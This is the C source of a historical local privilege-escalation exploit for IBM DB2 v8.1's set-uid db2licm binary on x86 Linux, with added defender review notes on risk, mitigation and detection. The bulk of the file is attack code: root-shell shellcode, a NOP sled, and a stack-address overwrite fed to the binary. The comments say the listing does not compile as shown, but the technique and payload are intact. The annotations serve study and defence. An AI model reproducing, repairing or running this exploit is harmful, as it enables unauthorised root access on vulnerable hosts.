/*
** IBM DB2 v8.1 - db2licm local buffer overflow exploit
** for x86 Linux
**
** This vulnerability was discovered by Juan Pablo Martinez
** Kuhn from Core Security Technologies in version 7.2, but
** the problem is still there in version 8.1, except we
** must stuff about 3 times as much data into the buffer.
**
** The exploit should work up to fix pack 4, bearing in
** mind the permissions by default are -r-sr-x---, so we
** need to be in the same group as the binary (db2grp1)
** to execute.
**
** Author: Jonathan So [ jonny [ @ ] nop-art.net ]
**
** Usage:
** tested on SuSE 8.0: ./db2licm-exp 4000
**
** Review notes (defender's reading of this historical proof of concept):
**
** - Risk: the header says db2licm ships set-uid (-r-sr-x---) and is
**   group-restricted, so the exposure is a local privilege escalation
**   for members of db2grp1 only; the header also says later fix packs
**   (after 4) are not expected to be affected -- confirm against vendor
**   advisories rather than this comment.
** - Mitigation: the technique depends on a fixed stack top
**   (STACK_TOP below) and on the stack being executable. Stack address
**   randomisation and a non-executable stack, both standard on current
**   Linux, defeat it independently of any DB2 fix. Removing the set-uid
**   bit or tightening the group membership limits the blast radius.
** - Detection: the program passes a single ~3 KB argv entry that is
**   mostly 0x90 bytes and ends in the literal "/bin/sh" to a set-uid
**   binary; execve argument auditing on the DB2 host would show it.
** - This listing does NOT compile as shown (see the inline notes):
**   the #include lost its header name, a cast is used as an lvalue,
**   and one statement has an unbalanced parenthesis. It is kept as
**   published; nothing here is a working or corrected exploit.
*/
#include                                   /* header name between angle brackets was dropped by extraction */
#define STACK_TOP 0xC0000000              /* assumed top of the user stack on 32-bit x86 Linux; hard-coded, so any stack randomisation breaks the assumption */
#define DB2LICM "/home/db2inst1/sqllib/adm/db2licm" /* target binary path, hard-coded for the default db2inst1 install */

int main(int argc, char **argv)
{
    /* Machine-code payload for x86 Linux. It contains no 0x00 byte
     * (which is why strlen() is usable on it below) and ends in the
     * "/bin/sh" path it launches. */
    char shellcode[]=
        "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
        "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
        "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
        "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";
    char *longbuff;     /* 3200-byte argument handed to db2licm; never freed (exec replaces the image) */
    int i;
    long *long_ptr;     /* write cursor for the repeated-address fill; assumes sizeof(long) == 4 */

    /* argv[1] is the "offset" subtracted from STACK_TOP. It is read with
     * atoi() and never validated; a non-numeric argument silently becomes 0. */
    if (argc<2) {
        printf("usage: %s [offset]\n", argv[0]);
        exit(1);
    }

    longbuff = (char *) malloc(3200);   /* result is not checked; the cast is unnecessary in C */

    /* Cast-as-lvalue: not valid C (it was a GCC extension removed in
     * GCC 4). The +2 start offset is an alignment fudge the page does
     * not explain. */
    (void *)long_ptr = longbuff+2;

    /* Fill the buffer with copies of (STACK_TOP - offset). Two defects:
     *  - the closing parenthesis after atoi(argv[1]) is unbalanced;
     *  - 800 iterations x sizeof(long) bytes starting at offset 2 end at
     *    byte 3201 with a 4-byte long, i.e. 2 bytes past the 3200-byte
     *    allocation (far more with an 8-byte long) -- a heap overrun in
     *    the program itself. */
    for (i=0;i<3200;i+=4) {
        *(long *)(long_ptr) = STACK_TOP - atoi(argv[1]));
        long_ptr++;
    }

    /* Overwrite the first 2000 bytes with 0x90 (x86 NOP), leaving the
     * address copies only in the tail of the buffer. */
    for(i=0;i<2000;i++)
        longbuff[i] = 0x90;

    /* Place the payload right after the NOP region. strlen() is safe
     * here only because the payload has no embedded NUL. */
    memcpy(longbuff+2000, shellcode, strlen(shellcode));

    longbuff[3199] = 0x00;   /* NUL-terminate so execl() passes the whole buffer as one argument */

    /* Replace this process with db2licm, passing the crafted argument.
     * The return value is not checked: execl() only returns on failure,
     * after which main falls off its closing brace (C99 semantics turn
     * that into exit status 0, masking the failure). The variadic
     * sentinel should be written (char *)NULL, since a plain NULL may
     * be an int-sized 0 on some ABIs. */
    execl(DB2LICM, DB2LICM, longbuff, NULL);
}